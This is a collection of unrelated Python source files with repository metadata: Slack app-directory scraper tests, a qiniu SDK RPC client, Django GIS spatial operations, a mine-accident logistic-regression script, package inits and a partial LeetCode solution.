4a22426b2433024a3241522215535731b0567900 | 8,580 | py | Python | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | null | null | null | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | 1 | 2021-06-01T22:02:37.000Z | 2021-06-01T22:02:37.000Z | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests
import responses
import unittest
import app_directory
class GetApplicationTest(unittest.TestCase):
@responses.activate
def test_it_returns_an_application(self):
url = app_directory.BASE_URL + 'A15KDN02Y-must-read'
with open('test/resources/A15KDN02Y-must-read.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
application = app_directory.get_application('A15KDN02Y-must-read')
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_512.jpg')
self.assertEqual(len(application['categories']), 4)
self.assertTrue(len(application['description']) > 0)
self.assertEqual(application['help_url'], 'https://finalem.com/must-read/help?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['privacy_policy_url'], 'https://finalem.com/must-read/privacy-policy?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(len(application['screenshots']), 6)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack ð\x9f\x93\x95ð\x9f\x93\x97ð\x9f\x93\x98')
self.assertEqual(application['slack_id'], 'A15KDN02Y')
self.assertEqual(application['slug'], 'A15KDN02Y-must-read')
self.assertEqual(application['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class GetApplicationsTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_list_of_applications(self):
url = app_directory.CATEGORY_URL + 'At0EFWTR6D-featured'
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
applications = app_directory.get_applications('At0EFWTR6D-featured', 1)
self.assertEqual(len(applications), 12)
self.assertEqual(applications[0]['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_96.jpg')
self.assertFalse(applications[0]['is_slack_owned'])
self.assertEqual(applications[0]['name'], '@must-read')
self.assertEqual(applications[0]['position'], 1)
self.assertEqual(applications[0]['short_description'], 'Controllable must-read lists for your team in Slack ð\x9f\x93\x95ð\x9f\x93\x97ð\x9f\x93\x98')
self.assertEqual(applications[0]['slack_id'], 'A15KDN02Y')
self.assertEqual(applications[0]['slug'], 'A15KDN02Y-must-read')
self.assertEqual(applications[0]['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class GetCategoriesTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_list_of_categories(self):
with open('test/resources/index.html', 'r') as f:
body = f.read()
responses.add(responses.GET, app_directory.BASE_URL, body=body)
categories = app_directory.get_categories()
self.assertEqual(len(categories), 25)
self.assertEqual(categories[0]['name'], 'Featured')
self.assertEqual(categories[0]['slack_id'], 'At0EFWTR6D')
self.assertEqual(categories[0]['slug'], 'At0EFWTR6D-featured')
self.assertEqual(categories[0]['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class GetCategoryTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_category(self):
url = app_directory.CATEGORY_URL + 'At0EFWTR6D-featured'
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
category = app_directory.get_category('At0EFWTR6D-featured')
self.assertEqual(category['description'], None)
self.assertEqual(category['name'], 'Featured')
self.assertEqual(category['slack_id'], 'At0EFWTR6D')
self.assertEqual(category['slug'], 'At0EFWTR6D-featured')
self.assertEqual(category['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class GetSoupTest(unittest.TestCase):
@responses.activate
def test_it_returns_an_instance_of_beautiful_soup(self):
with open('test/resources/index.html', 'r') as f:
body = f.read()
responses.add(responses.GET, app_directory.BASE_URL, body=body)
soup = app_directory.get_soup(app_directory.BASE_URL)
self.assertIsInstance(soup, BeautifulSoup)
@responses.activate
def test_it_raises_an_exception_when_the_response_is_not_ok(self):
responses.add(responses.GET, app_directory.BASE_URL, status=404)
with self.assertRaises(requests.exceptions.HTTPError):
app_directory.get_soup(app_directory.BASE_URL)
class ParseApplicationListItemTest(unittest.TestCase):
def test_it_returns_an_application(self):
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
soup = soup.find('li', class_='app_row interactive')
application = app_directory.parse_application_list_item(soup)
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_96.jpg')
self.assertFalse(application['is_slack_owned'])
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['position'], 1)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack 📕📗📘')
self.assertEqual(application['slack_id'], 'A15KDN02Y')
self.assertEqual(application['slug'], 'A15KDN02Y-must-read')
self.assertEqual(application['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class ParseApplicationTest(unittest.TestCase):
def test_it_returns_an_application(self):
with open('test/resources/A15KDN02Y-must-read.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
application = app_directory.parse_application(soup)
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_512.jpg')
self.assertEqual(len(application['categories']), 4)
self.assertTrue(len(application['description']) > 0)
self.assertEqual(application['help_url'], 'https://finalem.com/must-read/help?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['privacy_policy_url'], 'https://finalem.com/must-read/privacy-policy?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(len(application['screenshots']), 6)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack 📕📗📘')
class ParseCategoryLinkTest(unittest.TestCase):
def test_it_returns_a_category(self):
with open('test/resources/index.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
soup = soup.find('a', class_='sidebar_menu_list_item')
category = app_directory.parse_category_link(soup)
self.assertEqual(category['name'], 'Featured')
self.assertEqual(category['slack_id'], 'At0EFWTR6D')
self.assertEqual(category['slug'], 'At0EFWTR6D-featured')
self.assertEqual(category['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class ParseCategoryTest(unittest.TestCase):
def test_it_returns_a_category_with_a_description(self):
with open('test/resources/At0MQP5BEF-bots.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
category = app_directory.parse_category(soup)
self.assertEqual(category['description'], 'Bots are like having a virtual team member — they can help you manage tasks, run your team standup, poll the office, and more!')
self.assertEqual(category['name'], 'Bots')
def test_it_returns_a_category_without_a_description(self):
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
category = app_directory.parse_category(soup)
self.assertEqual(category['description'], None)
self.assertEqual(category['name'], 'Featured')
if __name__ == '__main__':
unittest.main()
| 46.378378 | 179 | 0.706643 |
4a2243dd7367394515055b2fb484f4593299d54e | 67 | py | Python | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 3,913 | 2021-03-14T13:54:52.000Z | 2022-03-30T05:09:55.000Z | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 667 | 2021-03-14T20:11:17.000Z | 2022-03-31T04:07:17.000Z | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 785 | 2021-03-14T13:20:57.000Z | 2022-03-31T03:26:03.000Z | """ Package containing various techniques of speech processing
"""
| 22.333333 | 62 | 0.776119 |
4a22444916aedda53cbb504613b51e95db265a25 | 4,987 | py | Python | qiniu/rpc.py | Yong-Lee/liyong | 9a7898099eedf37db41c459b4b52f334fbaa091a | [
"MIT"
] | 68 | 2015-01-13T03:40:11.000Z | 2020-06-16T11:37:03.000Z | qiniu/rpc.py | lepture/python-sdk | b9e2a048a40e0aed1e3bad3bf2ae7b46ff1523b1 | [
"MIT"
] | 1 | 2018-04-03T04:40:01.000Z | 2018-04-03T04:40:01.000Z | qiniu/rpc.py | lepture/python-sdk | b9e2a048a40e0aed1e3bad3bf2ae7b46ff1523b1 | [
"MIT"
] | 36 | 2015-01-12T13:47:24.000Z | 2018-12-02T15:07:50.000Z | # -*- coding: utf-8 -*-
import httplib_chunk as httplib
import json
import cStringIO
import conf
class Client(object):
_conn = None
_header = None
def __init__(self, host):
self._conn = httplib.HTTPConnection(host)
self._header = {}
def round_tripper(self, method, path, body):
self._conn.request(method, path, body, self._header)
resp = self._conn.getresponse()
return resp
def call(self, path):
return self.call_with(path, None)
def call_with(self, path, body, content_type=None, content_length=None):
ret = None
self.set_header("User-Agent", conf.USER_AGENT)
if content_type is not None:
self.set_header("Content-Type", content_type)
if content_length is not None:
self.set_header("Content-Length", content_length)
resp = self.round_tripper("POST", path, body)
try:
ret = resp.read()
ret = json.loads(ret)
except IOError, e:
return None, e
except ValueError:
pass
if resp.status / 100 != 2:
err_msg = ret if "error" not in ret else ret["error"]
detail = resp.getheader("x-log", None)
if detail is not None:
err_msg += ", detail:%s" % detail
return None, err_msg
return ret, None
def call_with_multipart(self, path, fields=None, files=None):
"""
* fields => {key}
* files => [{filename, data, content_type}]
"""
content_type, mr = self.encode_multipart_formdata(fields, files)
return self.call_with(path, mr, content_type, mr.length())
def call_with_form(self, path, ops):
"""
* ops => {"key": value/list()}
"""
body = []
for i in ops:
if isinstance(ops[i], (list, tuple)):
data = ('&%s=' % i).join(ops[i])
else:
data = ops[i]
body.append('%s=%s' % (i, data))
body = '&'.join(body)
content_type = "application/x-www-form-urlencoded"
return self.call_with(path, body, content_type, len(body))
def set_header(self, field, value):
self._header[field] = value
def set_headers(self, headers):
self._header.update(headers)
def encode_multipart_formdata(self, fields, files):
"""
* fields => {key}
* files => [{filename, data, content_type}]
* return content_type, content_length, body
"""
if files is None:
files = []
if fields is None:
fields = {}
readers = []
BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
CRLF = '\r\n'
L1 = []
for key in fields:
L1.append('--' + BOUNDARY)
L1.append('Content-Disposition: form-data; name="%s"' % key)
L1.append('')
L1.append(fields[key])
b1 = CRLF.join(L1)
readers.append(b1)
for file_info in files:
L = []
L.append('')
L.append('--' + BOUNDARY)
disposition = "Content-Disposition: form-data;"
filename = _qiniu_escape(file_info.get('filename'))
L.append('%s name="file"; filename="%s"' % (disposition, filename))
L.append('Content-Type: %s' % file_info.get('content_type', 'application/octet-stream'))
L.append('')
L.append('')
b2 = CRLF.join(L)
readers.append(b2)
data = file_info.get('data')
readers.append(data)
L3 = ['', '--' + BOUNDARY + '--', '']
b3 = CRLF.join(L3)
readers.append(b3)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, MultiReader(readers)
def _qiniu_escape(s):
edits = [('\\', '\\\\'), ('\"', '\\\"')]
for (search, replace) in edits:
s = s.replace(search, replace)
return s
class MultiReader(object):
""" class MultiReader([readers...])
MultiReader returns a read()able object that's the logical concatenation of
the provided input readers. They're read sequentially.
"""
def __init__(self, readers):
self.readers = []
self.content_length = 0
self.valid_content_length = True
for r in readers:
if hasattr(r, 'read'):
if self.valid_content_length:
length = self._get_content_length(r)
if length is not None:
self.content_length += length
else:
self.valid_content_length = False
else:
buf = r
if not isinstance(buf, basestring):
buf = str(buf)
buf = encode_unicode(buf)
r = cStringIO.StringIO(buf)
self.content_length += len(buf)
self.readers.append(r)
# don't name it __len__, because the length of MultiReader is not alway valid.
def length(self):
return self.content_length if self.valid_content_length else None
def _get_content_length(self, reader):
data_len = None
if hasattr(reader, 'seek') and hasattr(reader, 'tell'):
try:
reader.seek(0, 2)
data_len= reader.tell()
reader.seek(0, 0)
except OSError:
# Don't send a length if this failed
data_len = None
return data_len
def read(self, n=-1):
if n is None or n == -1:
return ''.join([encode_unicode(r.read()) for r in self.readers])
else:
L = []
while len(self.readers) > 0 and n > 0:
b = self.readers[0].read(n)
if len(b) == 0:
self.readers = self.readers[1:]
else:
L.append(encode_unicode(b))
n -= len(b)
return ''.join(L)
def encode_unicode(u):
if isinstance(u, unicode):
u = u.encode('utf8')
return u
| 24.566502 | 91 | 0.647283 |
4a2245680f7b11f08f3aeeeeda73818b3b97e90e | 6,371 | py | Python | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 15 | 2020-06-04T05:22:47.000Z | 2021-07-06T01:37:57.000Z | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 51 | 2019-10-08T01:53:02.000Z | 2021-06-04T22:02:21.000Z | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 11 | 2019-09-14T20:57:30.000Z | 2022-01-19T17:59:26.000Z | from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.models.functions import Distance
from django.contrib.gis.measure import (
Area as AreaMeasure, Distance as DistanceMeasure,
)
from django.db.utils import NotSupportedError
from django.utils.functional import cached_property
class BaseSpatialOperations:
# Quick booleans for the type of this spatial backend, and
# an attribute for the spatial database version tuple (if applicable)
postgis = False
spatialite = False
mysql = False
oracle = False
spatial_version = None
# How the geometry column should be selected.
select = '%s'
@cached_property
def select_extent(self):
return self.select
# Does the spatial database have a geometry or geography type?
geography = False
geometry = False
# Aggregates
disallowed_aggregates = ()
geom_func_prefix = ''
# Mapping between Django function names and backend names, when names do not
# match; used in spatial_function_name().
function_names = {}
# Blacklist/set of known unsupported functions of the backend
unsupported_functions = {
'Area', 'AsGeoJSON', 'AsGML', 'AsKML', 'AsSVG', 'Azimuth',
'BoundingCircle', 'Centroid', 'Difference', 'Distance', 'Envelope',
'GeoHash', 'GeometryDistance', 'Intersection', 'IsValid', 'Length',
'LineLocatePoint', 'MakeValid', 'MemSize', 'NumGeometries',
'NumPoints', 'Perimeter', 'PointOnSurface', 'Reverse', 'Scale',
'SnapToGrid', 'SymDifference', 'Transform', 'Translate', 'Union',
}
# Constructors
from_text = False
# Default conversion functions for aggregates; will be overridden if implemented
# for the spatial backend.
def convert_extent(self, box, srid):
raise NotImplementedError('Aggregate extent not implemented for this spatial backend.')
def convert_extent3d(self, box, srid):
raise NotImplementedError('Aggregate 3D extent not implemented for this spatial backend.')
# For quoting column values, rather than columns.
def geo_quote_name(self, name):
return "'%s'" % name
# GeometryField operations
def geo_db_type(self, f):
"""
Return the database column type for the geometry field on
the spatial backend.
"""
raise NotImplementedError('subclasses of BaseSpatialOperations must provide a geo_db_type() method')
def get_distance(self, f, value, lookup_type):
"""
Return the distance parameters for the given geometry field,
lookup value, and lookup type.
"""
raise NotImplementedError('Distance operations not available on this spatial backend.')
def get_geom_placeholder(self, f, value, compiler):
"""
Return the placeholder for the given geometry field with the given
value. Depending on the spatial backend, the placeholder may contain a
stored procedure call to the transformation function of the spatial
backend.
"""
def transform_value(value, field):
return value is not None and value.srid != field.srid
if hasattr(value, 'as_sql'):
return (
'%s(%%s, %s)' % (self.spatial_function_name('Transform'), f.srid)
if transform_value(value.output_field, f)
else '%s'
)
if transform_value(value, f):
# Add Transform() to the SQL placeholder.
return '%s(%s(%%s,%s), %s)' % (
self.spatial_function_name('Transform'),
self.from_text, value.srid, f.srid,
)
elif self.connection.features.has_spatialrefsys_table:
return '%s(%%s,%s)' % (self.from_text, f.srid)
else:
# For backwards compatibility on MySQL (#27464).
return '%s(%%s)' % self.from_text
def check_expression_support(self, expression):
if isinstance(expression, self.disallowed_aggregates):
raise NotSupportedError(
"%s spatial aggregation is not supported by this database backend." % expression.name
)
super().check_expression_support(expression)
def spatial_aggregate_name(self, agg_name):
raise NotImplementedError('Aggregate support not implemented for this spatial backend.')
def spatial_function_name(self, func_name):
if func_name in self.unsupported_functions:
raise NotSupportedError("This backend doesn't support the %s function." % func_name)
return self.function_names.get(func_name, self.geom_func_prefix + func_name)
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
raise NotImplementedError('Subclasses of BaseSpatialOperations must provide a geometry_columns() method.')
def spatial_ref_sys(self):
raise NotImplementedError('subclasses of BaseSpatialOperations must a provide spatial_ref_sys() method')
distance_expr_for_lookup = staticmethod(Distance)
def get_db_converters(self, expression):
converters = super().get_db_converters(expression)
if isinstance(expression.output_field, GeometryField):
converters.append(self.get_geometry_converter(expression))
return converters
def get_geometry_converter(self, expression):
raise NotImplementedError(
'Subclasses of BaseSpatialOperations must provide a '
'get_geometry_converter() method.'
)
def get_area_att_for_field(self, field):
if field.geodetic(self.connection):
if self.connection.features.supports_area_geodetic:
return 'sq_m'
raise NotImplementedError('Area on geodetic coordinate systems not supported.')
else:
units_name = field.units_name(self.connection)
if units_name:
return AreaMeasure.unit_attname(units_name)
def get_distance_att_for_field(self, field):
dist_att = None
if field.geodetic(self.connection):
if self.connection.features.supports_distance_geodetic:
dist_att = 'm'
else:
units = field.units_name(self.connection)
if units:
dist_att = DistanceMeasure.unit_attname(units)
return dist_att
| 39.08589 | 114 | 0.66583 |
4a2246d4483e8c4c03b5622cb94c683b4e0abaad | 171 | py | Python | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | from .._helpers import register
from ._read import read
from ._write import write
__all__ = [
"read",
"write",
]
register("toughreact-solute", [], read, write)
| 14.25 | 46 | 0.672515 |
4a2246e2485b6e28efc996f076e5ec21f0bf48b9 | 11,776 | py | Python | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | 1 | 2018-02-22T22:31:20.000Z | 2018-02-22T22:31:20.000Z | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | null | null | null | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env ipython
"""Load MSHA data and run a logistic regression.
@author: Albert
@version: 0.0.2
@date: 10/17/16
Note:
data file path is relative, use your own data file path
"""
import pandas as pd
import numpy as np
from sklearn import cross_validation
from sklearn.linear_model import LogisticRegression
from sklearn.learning_curve import learning_curve
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
def plot_decision_regions(X, y, classifier, resolution=0.02):
"""Plot decision regions for binary features.
"""
# setup marker generator and color map
markers = ('s', 'x', 'o', '^', 'v')
colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')
cmap = ListedColormap(colors[:len(np.unique(y))])
# plot the decision surface
x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1
x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),
np.arange(x2_min, x2_max, resolution))
Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)
Z = Z.reshape(xx1.shape)
plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)
plt.xlim(xx1.min(), xx1.max())
plt.ylim(xx2.min(), xx2.max())
# plot class samples
for idx, cl in enumerate(np.unique(y)):
plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],
alpha=0.8, c=cmap(idx),
marker=markers[idx], label=cl)
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""Generate a simple plot of the test and traning learning curve.
Parameters:
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
title : string
Title for the chart.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
ylim : tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
"""
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
plt.legend(loc="best")
return plt
def test_1(data_file_path, resolution=0.5, *args):
"""Plot two-feature decision boundary.
``log(penalty)`` vs. ``num_violation``
Data:
`top_5_accident_mines_geq_30.csv`
"""
data = pd.read_csv(data_file_path)
data.fillna(0, inplace=True)
feature1 = args[0]
feature2 = args[1]
label = args[2]
data[feature2] = np.log(data[feature2] + 1)
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel('log of ' + feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_2(data_file_path, resolution=0.5, *args):
"""Plot two-feature decision boundary.
``num_violation_t`` vs. ``num_violation_t_minus_1``
Data:
`Recent_5_Mine_Accidents_Data_training_2.csv`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_3(data_file_path, *args):
"""Check whether label is reasonable.
Plot ``num_violation`` vs. ``accident_label_t_plus_1``
Data:
`top_5_accident_mines_geq_80.csv`
"""
data = pd.read_csv(data_file_path)
feature1 = args[0]
label = args[1]
acc_label = data[label]
x_val = data[feature1]
plt.scatter(x_val, acc_label)
plt.xlabel(feature1)
plt.ylabel(label)
plt.ylim(-0.5, 1.5)
# plt.legend(loc='upper left')
plt.show()
def test_4(data_file_path, randseed, *args):
"""Plot learning curve.
"""
data = pd.read_csv(data_file_path)
feature1 = args[0]
label = args[1]
x_train = data[[feature1]].values
y_train = data[label].values
title = 'Learning Curve'
cv = cross_validation.ShuffleSplit(x_train.shape[0],
random_state=randseed)
estimator = LogisticRegression(C=500)
plot_learning_curve(estimator, title, x_train, y_train, cv=cv)
plt.show()
def test_5(data_file_path, resolution, *args):
"""`last_yr_penal` vs `last_yr_viols`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_6(data_file_path, resolution, *args):
"""`avg_last_3yr_viols` vs `last_yr_viols`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_7(data_file_path, resolution, *args):
"""`avg_last_3yr_penals` vs `last_yr_penals`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_8(data_file_path, resolution, *args):
"""`log(avg_last_3yr_penals)` vs `log(last_yr_penals)`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
data[feature1] = np.log(data[feature1] + 1)
data[feature2] = np.log(data[feature2] + 1)
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
if __name__ == "__main__":
dataset = ['../data/Recent_5_Mine_Accidents_Data_training_2.csv',
'../data/top_5_accident_mines_processed_geq_30.csv',
'../data/top_5_accident_mines_processed_geq_80.csv',
'../data/mine-id/4608791.csv',
'../data/mine-id/4608436.csv',
'../data/mine-id/4601437.csv',
'../data/mine-id/4201715.csv',
'../data/mine-id/1202215.csv',
'../data/mine-id/4608791_label-geq2.csv',
'../data/mine-id/master.csv',
'../data/mine-id/4608791_rolling_quarterly.csv',
'../data/mine-id/4608791_quarterly.csv',
'../data/mine-id/4608791_yearly.csv',
'../Data/mine-id/master_yearly.csv']
feature_list = ['num_violations',
'num_violations_t_minus_1',
'total_penalties',
u'date',
u'last_yr_viols',
u'last_yr_penals',
u'avg_last_3yr_viols',
u'avg_last_3yr_penals',
'accident_label_t_plus_1',
u'accident_label']
"""
# Group 1 - pre-accident feature tests
test_1(dataset[1], 0.5, feature_list[0],
feature_list[2], feature_list[8])
test_2(dataset[0], 0.5, feature_list[0],
feature_list[1], feature_list[8])
test_3(dataset[2], feature_list[2], feature_list[8])
test_4(dataset[1], 100, feature_list[0], feature_list[8])
"""
"""
# Group 2 - mine-id logistic regression
test_5(dataset[3], 50, feature_list[4],
feature_list[5], feature_list[9])
test_6(dataset[7], 10, feature_list[4],
feature_list[6], feature_list[9])
test_6(dataset[9], 10, feature_list[4],
feature_list[6], feature_list[9]) # all 6 mine data in one csv
test_7(dataset[3], 50, feature_list[5],
feature_list[7], feature_list[9])
"""
"""
# Group 3 - different time span
test_6(dataset[10], 50, feature_list[4],
feature_list[6], feature_list[9]) # quarterly rolling
test_7(dataset[11], 100, feature_list[5],
feature_list[7], feature_list[9]) # quarterly
test_7(dataset[12], 100, feature_list[5],
feature_list[7], feature_list[9]) # yearly
test_6(dataset[13], 50, feature_list[4],
feature_list[6], feature_list[9]) # yearly all 6 mind data
"""
test_8(dataset[13], 0.5, feature_list[5],
feature_list[7], feature_list[9]) # yearly all 6 mind data
| 29.58794 | 79 | 0.617018 |
4a224a702c24d5ae3665a2283c7b1faeabf33c33 | 666 | py | Python | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | 3 | 2022-02-07T12:47:43.000Z | 2022-03-13T16:40:12.000Z | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | null | null | null | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | null | null | null | class Solution:
def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = []
for item in nums1:
if item in nums2:
indexItem = nums2.index(item)
indexNext = indexItem + 1
while indexNext < len(nums2):
if nums2[indexNext] > nums2[indexItem]:
result.append(nums2[indexNext])
break
else:
indexNext += 1
